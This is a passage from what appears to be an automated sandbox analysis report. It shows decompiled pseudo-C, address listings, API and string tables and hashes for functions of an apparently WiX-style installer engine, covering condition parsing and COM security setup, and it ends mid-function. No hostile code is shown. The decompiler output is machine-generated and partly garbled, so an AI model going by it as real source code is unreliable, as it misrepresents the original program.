                                                                                                                                                                  0x0040526c
                                                                                                                                                                  0x00405273
                                                                                                                                                                  0x00405275
                                                                                                                                                                  0x0040527d
                                                                                                                                                                  0x0040527e
                                                                                                                                                                  0x0040527e
                                                                                                                                                                  0x00405281
                                                                                                                                                                  0x00405286
                                                                                                                                                                  0x00405286
                                                                                                                                                                  0x00405287
                                                                                                                                                                  0x0040528c
                                                                                                                                                                  0x0040525a
                                                                                                                                                                  0x00405252
                                                                                                                                                                  0x00405244
                                                                                                                                                                  0x00405156
                                                                                                                                                                  0x00405156
                                                                                                                                                                  0x00405164
                                                                                                                                                                  0x00405166
                                                                                                                                                                  0x00405601
                                                                                                                                                                  0x00405604
                                                                                                                                                                  0x0040560a
                                                                                                                                                                  0x0040560a
                                                                                                                                                                  0x00405150
                                                                                                                                                                  0x0040514d
                                                                                                                                                                  0x00405148
                                                                                                                                                                  0x00405138
                                                                                                                                                                  0x0040512e
                                                                                                                                                                  0x0040560d
                                                                                                                                                                  0x00405613

                                                                                                                                                                  APIs
                                                                                                                                                                  • GetStringTypeW.KERNEL32(00000001,EB0043D5,00000001,?,004059AE,?,00000000,00000000,?,?,00405996,?,?,00000000,?), ref: 004050F8
                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to parse condition "%ls". Constant too big, at position %d., xrefs: 004054C4
                                                                                                                                                                  • Failed to parse condition "%ls". Invalid version format, at position %d., xrefs: 00405357
                                                                                                                                                                  • NOT, xrefs: 004053F8
                                                                                                                                                                  • Failed to parse condition "%ls". Unterminated literal at position %d., xrefs: 004051BE
                                                                                                                                                                  • AND, xrefs: 004053D8
                                                                                                                                                                  • @, xrefs: 004050FE
                                                                                                                                                                  • -, xrefs: 00405239
                                                                                                                                                                  • Failed to parse condition "%ls". Version can have a maximum of 4 parts, at position %d., xrefs: 004052FC
                                                                                                                                                                  • condition.cpp, xrefs: 004051A4, 00405267, 004052E2, 0040533D, 004054AA, 004054ED, 0040552E
                                                                                                                                                                  • Failed to parse condition "%ls". Identifier cannot start at a digit, at position %d., xrefs: 00405507
                                                                                                                                                                  • ", xrefs: 0040513E
                                                                                                                                                                  • Failed to set symbol value., xrefs: 0040543E
                                                                                                                                                                  • Failed to parse condition "%ls". Unexpected '~' operator at position %d., xrefs: 00405541
                                                                                                                                                                  • Failed to parse condition "%ls". Unexpected character at position %d., xrefs: 00405281
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: StringType
                                                                                                                                                                  • String ID: "$-$@$AND$Failed to parse condition "%ls". Constant too big, at position %d.$Failed to parse condition "%ls". Identifier cannot start at a digit, at position %d.$Failed to parse condition "%ls". Invalid version format, at position %d.$Failed to parse condition "%ls". Unexpected '~' operator at position %d.$Failed to parse condition "%ls". Unexpected character at position %d.$Failed to parse condition "%ls". Unterminated literal at position %d.$Failed to parse condition "%ls". Version can have a maximum of 4 parts, at position %d.$Failed to set symbol value.$NOT$condition.cpp
                                                                                                                                                                  • API String ID: 4177115715-2155003793
                                                                                                                                                                  • Opcode ID: bea32995ff9481cb0ed09a9c2eee66d472e41d96604d3ff3c8769b1e856c34a0
                                                                                                                                                                  • Instruction ID: f23c065968af7801baca7590086f758c6b45fcb93d6b1e02f208cf91278a1612
                                                                                                                                                                  • Opcode Fuzzy Hash: bea32995ff9481cb0ed09a9c2eee66d472e41d96604d3ff3c8769b1e856c34a0
                                                                                                                                                                  • Instruction Fuzzy Hash: 48E10171900A04EBDB258F40DC85BAB7BA5EF09710F6440A7F905AE2C5D7BDC981CF98
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00432C36, Relevance: 38.8, APIs: 21, Strings: 1, Instructions: 342COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 38%
                                                                                                                                                                  			E00432C36(void* __ecx, void* __edx, void* __eflags) {
				signed int _v8;
				char* _v12;
				intOrPtr _v16;
				int _v20;
				int _v24;
				int _v28;
				int _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				char* _v44;
				intOrPtr _v48;
				int _v52;
				int _v56;
				int _v60;
				int _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				char* _v76;
				intOrPtr _v80;
				int _v84;
				int _v88;
				int _v92;
				int _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				char* _v108;
				intOrPtr _v112;
				int _v116;
				int _v120;
				int _v124;
				int _v128;
				intOrPtr _v132;
				intOrPtr _v136;
				void* _v140;
				intOrPtr _v144;
				int _v148;
				int _v152;
				int _v156;
				int _v160;
				char _v164;
				char _v168;
				char _v232;
				void _v240;
				char _v304;
				char _v312;
				char _v376;
				char _v384;
				char _v448;
				char _v456;
				char _v520;
				char _v528;
				char _v532;
				int _v536;
				struct _SECURITY_DESCRIPTOR _v556;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t86;
				signed short _t105;
				signed short _t108;
				signed short _t111;
				signed short _t114;
				signed short _t117;
				signed short _t124;
				signed short _t127;
				signed short _t130;
				signed short _t132;
				struct _SECURITY_DESCRIPTOR* _t133;
				signed short _t137;
				void* _t138;
				signed short _t140;
				signed short _t141;
				signed short _t142;
				signed short _t143;
				signed short _t144;
				signed short _t145;
				signed short _t146;
				signed short _t147;
				intOrPtr _t150;
				void* _t155;
				void* _t156;
				intOrPtr* _t157;
				intOrPtr _t158;
				signed short _t162;
				signed short _t165;
				signed short _t168;
				signed short _t171;
				signed short _t174;
				signed short _t177;
				signed short _t180;
				signed short _t183;
				signed short _t186;
				signed int _t190;

				_t193 = __eflags;
				_t149 = __ecx;
				_t86 =  *0x4560d0; // 0xae480e18
				_v8 = _t86 ^ _t190;
				_v556.Revision = 0;
				_t154 =  &(_v556.Sbz1);
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosw");
				_push(0x9c);
				asm("stosb");
				_push(0);
				_push( &_v164);
				_v168 = 0;
				E004267C0(0, __ecx,  &(_v556.Sbz1), _t155, __eflags);
				_t156 = 0x40;
				_push(_t156);
				asm("xorps xmm0, xmm0");
				_push(0);
				_push( &_v232);
				_v536 = 0;
				asm("movlpd [ebp-0xec], xmm0");
				E004267C0(0, __ecx,  &(_v556.Sbz1), _t156, __eflags);
				_push(_t156);
				asm("xorps xmm0, xmm0");
				_push(0);
				_push( &_v304);
				asm("movlpd [ebp-0x134], xmm0");
				E004267C0(0, __ecx,  &(_v556.Sbz1), _t156, __eflags);
				_push(_t156);
				asm("xorps xmm0, xmm0");
				_push(0);
				_push( &_v376);
				asm("movlpd [ebp-0x17c], xmm0");
				E004267C0(0, _t149, _t154, _t156, _t193);
				_push(_t156);
				asm("xorps xmm0, xmm0");
				_push(0);
				_push( &_v448);
				asm("movlpd [ebp-0x1c4], xmm0");
				E004267C0(0, _t149, _t154, _t156, _t193);
				_push(_t156);
				asm("xorps xmm0, xmm0");
				_push(0);
				_push( &_v520);
				asm("movlpd [ebp-0x20c], xmm0");
				E004267C0(0, _t149, _t154, _t156, _t193);
				_v532 = 0;
				if(InitializeSecurityDescriptor( &_v556, 1) != 0) {
					_t157 = __imp__CreateWellKnownSid;
					_t154 = 0x48;
					_v532 = _t154;
					_t105 =  *_t157(0x1a, 0,  &_v240,  &_v532);
					__eflags = _t105;
					if(_t105 != 0) {
						_v532 = _t154;
						_t108 =  *_t157(0x17, 0,  &_v312,  &_v532);
						__eflags = _t108;
						if(_t108 != 0) {
							_v532 = _t154;
							_t111 =  *_t157(0x18, 0,  &_v384,  &_v532);
							__eflags = _t111;
							if(_t111 != 0) {
								_v532 = _t154;
								_t114 =  *_t157(0x10, 0,  &_v456,  &_v532);
								__eflags = _t114;
								if(_t114 != 0) {
									_v532 = _t154;
									_t117 =  *_t157(0x16, 0,  &_v528,  &_v532);
									__eflags = _t117;
									if(_t117 != 0) {
										_v140 =  &_v240;
										_t150 = 3;
										_v108 =  &_v312;
										_v76 =  &_v384;
										_t158 = 2;
										_v44 =  &_v456;
										_v12 =  &_v528;
										_t124 =  &_v168;
										_v168 = _t150;
										_v164 = _t158;
										_v160 = 0;
										_v156 = 0;
										_v152 = 0;
										_v148 = 0;
										_v144 = _t158;
										_v136 = _t150;
										_v132 = _t158;
										_v128 = 0;
										_v124 = 0;
										_v120 = 0;
										_v116 = 0;
										_v112 = _t158;
										_v104 = _t150;
										_v100 = _t158;
										_v96 = 0;
										_v92 = 0;
										_v88 = 0;
										_v84 = 0;
										_v80 = _t158;
										_v72 = _t150;
										_v68 = _t158;
										_v64 = 0;
										_v60 = 0;
										_v56 = 0;
										_v52 = 0;
										_v48 = _t158;
										_v40 = _t150;
										_v36 = _t158;
										_v32 = 0;
										_v28 = 0;
										_v24 = 0;
										_v20 = 0;
										_v16 = _t158;
										__imp__SetEntriesInAclA(5, _t124, 0,  &_v536);
										__eflags = _t124;
										if(_t124 == 0) {
											_t127 = SetSecurityDescriptorOwner( &_v556,  &_v240, 0);
											__eflags = _t127;
											if(_t127 != 0) {
												_t130 = SetSecurityDescriptorGroup( &_v556,  &_v240, 0);
												__eflags = _t130;
												if(_t130 != 0) {
													_t132 = SetSecurityDescriptorDacl( &_v556, 1, _v536, 0);
													__eflags = _t132;
													if(_t132 != 0) {
														_t133 =  &_v556;
														__imp__CoInitializeSecurity(_t133, 0xffffffff, 0, 0, 6, _t158, 0, 0x3000, 0);
														_t159 = _t133;
													} else {
														_t137 = GetLastError();
														__eflags = _t137;
														_t162 =  <=  ? _t137 : _t137 & 0x0000ffff | 0x80070000;
														_t138 = 0x80004005;
														__eflags = _t162;
														_t159 =  >=  ? 0x80004005 : _t162;
														_push( >=  ? 0x80004005 : _t162);
														_push(0xea);
														goto L20;
													}
												} else {
													_t140 = GetLastError();
													__eflags = _t140;
													_t165 =  <=  ? _t140 : _t140 & 0x0000ffff | 0x80070000;
													_t138 = 0x80004005;
													__eflags = _t165;
													_t159 =  >=  ? 0x80004005 : _t165;
													_push( >=  ? 0x80004005 : _t165);
													_push(0xe4);
													goto L20;
												}
											} else {
												_t141 = GetLastError();
												__eflags = _t141;
												_t168 =  <=  ? _t141 : _t141 & 0x0000ffff | 0x80070000;
												_t138 = 0x80004005;
												__eflags = _t168;
												_t159 =  >=  ? 0x80004005 : _t168;
												_push( >=  ? 0x80004005 : _t168);
												_push(0xde);
												goto L20;
											}
										} else {
											__eflags = _t124;
											_t171 =  <=  ? _t124 : _t124 & 0x0000ffff | 0x80070000;
											_t138 = 0x80004005;
											__eflags = _t171;
											_t159 =  >=  ? 0x80004005 : _t171;
											_push( >=  ? 0x80004005 : _t171);
											_push(0xd9);
											goto L20;
										}
									} else {
										_t142 = GetLastError();
										__eflags = _t142;
										_t174 =  <=  ? _t142 : _t142 & 0x0000ffff | 0x80070000;
										_t138 = 0x80004005;
										__eflags = _t174;
										_t159 =  >=  ? 0x80004005 : _t174;
										_push( >=  ? 0x80004005 : _t174);
										_push(0xa5);
										goto L20;
									}
								} else {
									_t143 = GetLastError();
									__eflags = _t143;
									_t177 =  <=  ? _t143 : _t143 & 0x0000ffff | 0x80070000;
									_t138 = 0x80004005;
									__eflags = _t177;
									_t159 =  >=  ? 0x80004005 : _t177;
									_push( >=  ? 0x80004005 : _t177);
									_push(0x9e);
									goto L20;
								}
							} else {
								_t144 = GetLastError();
								__eflags = _t144;
								_t180 =  <=  ? _t144 : _t144 & 0x0000ffff | 0x80070000;
								_t138 = 0x80004005;
								__eflags = _t180;
								_t159 =  >=  ? 0x80004005 : _t180;
								_push( >=  ? 0x80004005 : _t180);
								_push(0x97);
								goto L20;
							}
						} else {
							_t145 = GetLastError();
							__eflags = _t145;
							_t183 =  <=  ? _t145 : _t145 & 0x0000ffff | 0x80070000;
							_t138 = 0x80004005;
							__eflags = _t183;
							_t159 =  >=  ? 0x80004005 : _t183;
							_push( >=  ? 0x80004005 : _t183);
							_push(0x90);
							goto L20;
						}
					} else {
						_t146 = GetLastError();
						__eflags = _t146;
						_t186 =  <=  ? _t146 : _t146 & 0x0000ffff | 0x80070000;
						_t138 = 0x80004005;
						__eflags = _t186;
						_t159 =  >=  ? 0x80004005 : _t186;
						_push( >=  ? 0x80004005 : _t186);
						_push(0x89);
						goto L20;
					}
				} else {
					_t147 = GetLastError();
					_t189 =  <=  ? _t147 : _t147 & 0x0000ffff | 0x80070000;
					_t138 = 0x80004005;
					_t159 =  >=  ? 0x80004005 :  <=  ? _t147 : _t147 & 0x0000ffff | 0x80070000;
					_push( >=  ? 0x80004005 :  <=  ? _t147 : _t147 & 0x0000ffff | 0x80070000);
					_push(0x82);
					L20:
					_push("srputil.cpp");
					E004300D9(_t138);
				}
				if(_v536 != 0) {
					LocalFree(_v536);
				}
				return L004267AF(_t159, _v8 ^ _t190, _t154, _t159);
			}
































































































                                                                                                                                                                  0x00432c36
                                                                                                                                                                  0x00432c36
                                                                                                                                                                  0x00432c3f
                                                                                                                                                                  0x00432c46
                                                                                                                                                                  0x00432c50
                                                                                                                                                                  0x00432c56
                                                                                                                                                                  0x00432c5c
                                                                                                                                                                  0x00432c5d
                                                                                                                                                                  0x00432c5e
                                                                                                                                                                  0x00432c5f
                                                                                                                                                                  0x00432c60
                                                                                                                                                                  0x00432c62
                                                                                                                                                                  0x00432c67
                                                                                                                                                                  0x00432c6e
                                                                                                                                                                  0x00432c6f
                                                                                                                                                                  0x00432c70
                                                                                                                                                                  0x00432c76
                                                                                                                                                                  0x00432c7d
                                                                                                                                                                  0x00432c7e
                                                                                                                                                                  0x00432c85
                                                                                                                                                                  0x00432c88
                                                                                                                                                                  0x00432c89
                                                                                                                                                                  0x00432c8a
                                                                                                                                                                  0x00432c90
                                                                                                                                                                  0x00432c98
                                                                                                                                                                  0x00432c9d
                                                                                                                                                                  0x00432ca4
                                                                                                                                                                  0x00432ca7
                                                                                                                                                                  0x00432ca8
                                                                                                                                                                  0x00432ca9
                                                                                                                                                                  0x00432cb1
                                                                                                                                                                  0x00432cb6
                                                                                                                                                                  0x00432cbd
                                                                                                                                                                  0x00432cc0
                                                                                                                                                                  0x00432cc1
                                                                                                                                                                  0x00432cc2
                                                                                                                                                                  0x00432cca
                                                                                                                                                                  0x00432ccf
                                                                                                                                                                  0x00432cd6
                                                                                                                                                                  0x00432cd9
                                                                                                                                                                  0x00432cda
                                                                                                                                                                  0x00432cdb
                                                                                                                                                                  0x00432ce3
                                                                                                                                                                  0x00432ce8
                                                                                                                                                                  0x00432cef
                                                                                                                                                                  0x00432cf2
                                                                                                                                                                  0x00432cf3
                                                                                                                                                                  0x00432cf4
                                                                                                                                                                  0x00432cfc
                                                                                                                                                                  0x00432d0d
                                                                                                                                                                  0x00432d1b
                                                                                                                                                                  0x00432d46
                                                                                                                                                                  0x00432d4e
                                                                                                                                                                  0x00432d60
                                                                                                                                                                  0x00432d66
                                                                                                                                                                  0x00432d68
                                                                                                                                                                  0x00432d6a
                                                                                                                                                                  0x00432da6
                                                                                                                                                                  0x00432dac
                                                                                                                                                                  0x00432dae
                                                                                                                                                                  0x00432db0
                                                                                                                                                                  0x00432dec
                                                                                                                                                                  0x00432df2
                                                                                                                                                                  0x00432df4
                                                                                                                                                                  0x00432df6
                                                                                                                                                                  0x00432e32
                                                                                                                                                                  0x00432e38
                                                                                                                                                                  0x00432e3a
                                                                                                                                                                  0x00432e3c
                                                                                                                                                                  0x00432e78
                                                                                                                                                                  0x00432e7e
                                                                                                                                                                  0x00432e80
                                                                                                                                                                  0x00432e82
                                                                                                                                                                  0x00432eb3
                                                                                                                                                                  0x00432ebb
                                                                                                                                                                  0x00432ec2
                                                                                                                                                                  0x00432ecb
                                                                                                                                                                  0x00432ed0
                                                                                                                                                                  0x00432ed7
                                                                                                                                                                  0x00432ee0
                                                                                                                                                                  0x00432eeb
                                                                                                                                                                  0x00432ef4
                                                                                                                                                                  0x00432efa
                                                                                                                                                                  0x00432f00
                                                                                                                                                                  0x00432f06
                                                                                                                                                                  0x00432f0c
                                                                                                                                                                  0x00432f12
                                                                                                                                                                  0x00432f18
                                                                                                                                                                  0x00432f1e
                                                                                                                                                                  0x00432f24
                                                                                                                                                                  0x00432f27
                                                                                                                                                                  0x00432f2a
                                                                                                                                                                  0x00432f2d
                                                                                                                                                                  0x00432f30
                                                                                                                                                                  0x00432f33
                                                                                                                                                                  0x00432f36
                                                                                                                                                                  0x00432f39
                                                                                                                                                                  0x00432f3c
                                                                                                                                                                  0x00432f3f
                                                                                                                                                                  0x00432f42
                                                                                                                                                                  0x00432f45
                                                                                                                                                                  0x00432f48
                                                                                                                                                                  0x00432f4b
                                                                                                                                                                  0x00432f4e
                                                                                                                                                                  0x00432f51
                                                                                                                                                                  0x00432f54
                                                                                                                                                                  0x00432f57
                                                                                                                                                                  0x00432f5a
                                                                                                                                                                  0x00432f5d
                                                                                                                                                                  0x00432f60
                                                                                                                                                                  0x00432f63
                                                                                                                                                                  0x00432f66
                                                                                                                                                                  0x00432f69
                                                                                                                                                                  0x00432f6c
                                                                                                                                                                  0x00432f6f
                                                                                                                                                                  0x00432f72
                                                                                                                                                                  0x00432f75
                                                                                                                                                                  0x00432f7b
                                                                                                                                                                  0x00432f7d
                                                                                                                                                                  0x00432fb1
                                                                                                                                                                  0x00432fb7
                                                                                                                                                                  0x00432fb9
                                                                                                                                                                  0x00432ff0
                                                                                                                                                                  0x00432ff6
                                                                                                                                                                  0x00432ff8
                                                                                                                                                                  0x00433030
                                                                                                                                                                  0x00433036
                                                                                                                                                                  0x00433038
                                                                                                                                                                  0x00433078
                                                                                                                                                                  0x0043307f
                                                                                                                                                                  0x00433085
                                                                                                                                                                  0x0043303a
                                                                                                                                                                  0x0043303a
                                                                                                                                                                  0x00433049
                                                                                                                                                                  0x0043304b
                                                                                                                                                                  0x0043304e
                                                                                                                                                                  0x00433053
                                                                                                                                                                  0x00433055
                                                                                                                                                                  0x00433058
                                                                                                                                                                  0x00433059
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00433059
                                                                                                                                                                  0x00432ffa
                                                                                                                                                                  0x00432ffa
                                                                                                                                                                  0x00433009
                                                                                                                                                                  0x0043300b
                                                                                                                                                                  0x0043300e
                                                                                                                                                                  0x00433013
                                                                                                                                                                  0x00433015
                                                                                                                                                                  0x00433018
                                                                                                                                                                  0x00433019
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00433019
                                                                                                                                                                  0x00432fbb
                                                                                                                                                                  0x00432fbb
                                                                                                                                                                  0x00432fca
                                                                                                                                                                  0x00432fcc
                                                                                                                                                                  0x00432fcf
                                                                                                                                                                  0x00432fd4
                                                                                                                                                                  0x00432fd6
                                                                                                                                                                  0x00432fd9
                                                                                                                                                                  0x00432fda
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00432fda
                                                                                                                                                                  0x00432f7f
                                                                                                                                                                  0x00432f88
                                                                                                                                                                  0x00432f8a
                                                                                                                                                                  0x00432f8d
                                                                                                                                                                  0x00432f92
                                                                                                                                                                  0x00432f94
                                                                                                                                                                  0x00432f97
                                                                                                                                                                  0x00432f98
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00432f98
                                                                                                                                                                  0x00432e84
                                                                                                                                                                  0x00432e84
                                                                                                                                                                  0x00432e93
                                                                                                                                                                  0x00432e95
                                                                                                                                                                  0x00432e98
                                                                                                                                                                  0x00432e9d
                                                                                                                                                                  0x00432e9f
                                                                                                                                                                  0x00432ea2
                                                                                                                                                                  0x00432ea3
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00432ea3
                                                                                                                                                                  0x00432e3e
                                                                                                                                                                  0x00432e3e
                                                                                                                                                                  0x00432e4d
                                                                                                                                                                  0x00432e4f
                                                                                                                                                                  0x00432e52
                                                                                                                                                                  0x00432e57
                                                                                                                                                                  0x00432e59
                                                                                                                                                                  0x00432e5c
                                                                                                                                                                  0x00432e5d
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00432e5d
                                                                                                                                                                  0x00432df8
                                                                                                                                                                  0x00432df8
                                                                                                                                                                  0x00432e07
                                                                                                                                                                  0x00432e09
                                                                                                                                                                  0x00432e0c
                                                                                                                                                                  0x00432e11
                                                                                                                                                                  0x00432e13
                                                                                                                                                                  0x00432e16
                                                                                                                                                                  0x00432e17
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00432e17
                                                                                                                                                                  0x00432db2
                                                                                                                                                                  0x00432db2
                                                                                                                                                                  0x00432dc1
                                                                                                                                                                  0x00432dc3
                                                                                                                                                                  0x00432dc6
                                                                                                                                                                  0x00432dcb
                                                                                                                                                                  0x00432dcd
                                                                                                                                                                  0x00432dd0
                                                                                                                                                                  0x00432dd1
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00432dd1
                                                                                                                                                                  0x00432d6c
                                                                                                                                                                  0x00432d6c
                                                                                                                                                                  0x00432d7b
                                                                                                                                                                  0x00432d7d
                                                                                                                                                                  0x00432d80
                                                                                                                                                                  0x00432d85
                                                                                                                                                                  0x00432d87
                                                                                                                                                                  0x00432d8a
                                                                                                                                                                  0x00432d8b
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00432d8b
                                                                                                                                                                  0x00432d1d
                                                                                                                                                                  0x00432d1d
                                                                                                                                                                  0x00432d2e
                                                                                                                                                                  0x00432d31
                                                                                                                                                                  0x00432d38
                                                                                                                                                                  0x00432d3b
                                                                                                                                                                  0x00432d3c
                                                                                                                                                                  0x0043305e
                                                                                                                                                                  0x0043305e
                                                                                                                                                                  0x00433063
                                                                                                                                                                  0x00433063
                                                                                                                                                                  0x0043308d
                                                                                                                                                                  0x00433095
                                                                                                                                                                  0x00433095
                                                                                                                                                                  0x004330ab

                                                                                                                                                                  APIs
                                                                                                                                                                  • InitializeSecurityDescriptor.ADVAPI32(?,00000001), ref: 00432D13
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00432D1D
                                                                                                                                                                  • CreateWellKnownSid.ADVAPI32(0000001A,00000000,?,?), ref: 00432D66
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00432D6C
                                                                                                                                                                  • CoInitializeSecurity.OLE32(?,000000FF,00000000,00000000,00000006,00000002,00000000,00003000,00000000), ref: 0043307F
                                                                                                                                                                  • LocalFree.KERNEL32(?), ref: 00433095
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorInitializeLastSecurity$CreateDescriptorFreeKnownLocalWell
                                                                                                                                                                  • String ID: srputil.cpp
                                                                                                                                                                  • API String ID: 3128086125-4105181634
                                                                                                                                                                  • Opcode ID: fb9d8b7f6f28cb4cf7af1031e73d3d72e4f4cbe1e34885de2a6594803e2e064f
                                                                                                                                                                  • Instruction ID: 3854fb29efb0e50843e7b96504a9bfe223bbadbb0d44c6a8133691a22e04a1c5
                                                                                                                                                                  • Opcode Fuzzy Hash: fb9d8b7f6f28cb4cf7af1031e73d3d72e4f4cbe1e34885de2a6594803e2e064f
                                                                                                                                                                  • Instruction Fuzzy Hash: 01C12171D4122CAAEB20DF659D84BEBBAF8FF08740F1142ABE909F6150D7754E418FA4
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 004229CE, Relevance: 37.1, APIs: 1, Strings: 20, Instructions: 362COMMONCrypto
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 82%
                                                                                                                                                                  			E004229CE(void* __ebx, void* __ecx, void* __edi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr* _a40, intOrPtr _a44, intOrPtr _a48, intOrPtr _a52, intOrPtr _a56, intOrPtr* _a60, intOrPtr* _a64, intOrPtr* _a68, intOrPtr* _a72, intOrPtr _a76) {
				void* _v8;
				intOrPtr _t81;
				intOrPtr* _t83;
				intOrPtr _t86;
				intOrPtr* _t88;
				intOrPtr* _t92;
				intOrPtr* _t97;
				intOrPtr* _t98;
				intOrPtr _t103;
				intOrPtr _t104;
				intOrPtr* _t106;
				intOrPtr* _t109;
				intOrPtr* _t112;
				intOrPtr* _t114;
				intOrPtr _t135;
				intOrPtr _t139;
				intOrPtr _t144;
				void* _t157;
				intOrPtr _t160;
				intOrPtr* _t162;
				intOrPtr* _t170;
				intOrPtr _t171;
				void* _t173;
				intOrPtr _t174;
				intOrPtr _t184;
				void* _t185;
				intOrPtr _t186;
				intOrPtr* _t188;
				intOrPtr* _t194;
				intOrPtr* _t197;
				intOrPtr _t199;
				void* _t200;

				_t185 = __edi;
				_t157 = __ebx;
				_push(__ecx);
				_v8 = 0;
				if(E00411E63(_a24) != 0) {
					E00433CEA( &_v8, L" -%ls", _t80);
					_t200 = _t200 + 0xc;
				}
				_push(_t157);
				_push(_t185);
				_t81 = E00431078(8, 1);
				_t186 = _a12;
				 *((intOrPtr*)(_t186 + 0x7c)) = _t81;
				if(_t81 != 0) {
					 *((intOrPtr*)(_t186 + 0x80)) = 1;
					 *((intOrPtr*)( *((intOrPtr*)(_t186 + 0x7c)))) = E00431078(0x58, 1);
					_t83 =  *((intOrPtr*)(_t186 + 0x7c));
					__eflags = _t83;
					if(_t83 != 0) {
						_t160 = _a44;
						 *((intOrPtr*)( *_t83 + 4)) = 3;
						_t86 =  *((intOrPtr*)( *((intOrPtr*)(_t186 + 0x7c))));
						 *((intOrPtr*)(_t86 + 0x10)) = _t160;
						 *((intOrPtr*)(_t86 + 0x14)) = _a48;
						_t88 = E00433F88( *((intOrPtr*)( *((intOrPtr*)(_t186 + 0x7c)))), _a20, 0);
						__eflags = _t88;
						if(_t88 >= 0) {
							_t92 = E00433F88( *((intOrPtr*)( *((intOrPtr*)(_t186 + 0x7c)))) + 0x18, _a32, 0);
							__eflags = _t92;
							if(_t92 >= 0) {
								_t97 = E00433F88( *((intOrPtr*)( *((intOrPtr*)(_t186 + 0x7c)))) + 0x38, _a36, 0);
								__eflags = _t97;
								if(_t97 >= 0) {
									_t98 = _a40;
									_t170 = 0;
									__eflags = _t98;
									if(_t98 == 0) {
										L18:
										__eflags = _a72;
										if(_a72 == 0) {
											L22:
											_t171 = _a28;
											__eflags = _t171 - 4;
											if(_t171 == 4) {
												L25:
												_t184 = 1;
												_t194 = 0;
												__eflags = 0;
											} else {
												__eflags = _t171 - 3;
												if(_t171 == 3) {
													goto L25;
												} else {
													_t194 = 0;
													_t184 = 0;
												}
											}
											 *((intOrPtr*)( *((intOrPtr*)(_t186 + 0x7c)) + 4)) = _t184;
											 *((intOrPtr*)(_t186 + 0xa4)) = 1;
											 *((intOrPtr*)(_t186 + 0x8c)) = 1;
											 *((intOrPtr*)(_t186 + 0x14)) = _a16;
											 *((intOrPtr*)(_t186 + 0x40)) = _t171;
											__eflags = _t171 - 4;
											if(_t171 == 4) {
												L29:
												_t103 = 2;
											} else {
												__eflags = _t171 - 3;
												if(_t171 == 3) {
													goto L29;
												} else {
													_t103 = _t194;
												}
											}
											 *((intOrPtr*)(_t186 + 0x44)) = _t103;
											_t104 = _a48;
											 *((intOrPtr*)(_t186 + 0x2c)) = _t104;
											 *((intOrPtr*)(_t186 + 0x34)) = _t104;
											 *((intOrPtr*)(_t186 + 0x28)) = _t160;
											 *((intOrPtr*)(_t186 + 0x30)) = _t160;
											 *((intOrPtr*)(_t186 + 0x1c)) = _a52;
											_t106 = E00433F88(_t186, _a20, _t194);
											__eflags = _t106;
											if(_t106 >= 0) {
												_t52 = _t186 + 0x24; // 0x11c
												_t109 = E00433F88(_t52, _a20, 0);
												__eflags = _t109;
												if(_t109 >= 0) {
													_t54 = _t186 + 0x94; // 0x18c
													_t161 = _t54;
													_t197 = E00433F88(_t54, _a56, 0);
													__eflags = _t197;
													if(_t197 >= 0) {
														_t112 = _v8;
														__eflags = _t112;
														if(_t112 == 0) {
															L39:
															__eflags = _a60;
															if(_a60 == 0) {
																L46:
																__eflags = _a64;
																if(_a64 == 0) {
																	L53:
																	_t173 = _a4 + 0xf7530000;
																	asm("adc eax, 0xfffcfff9");
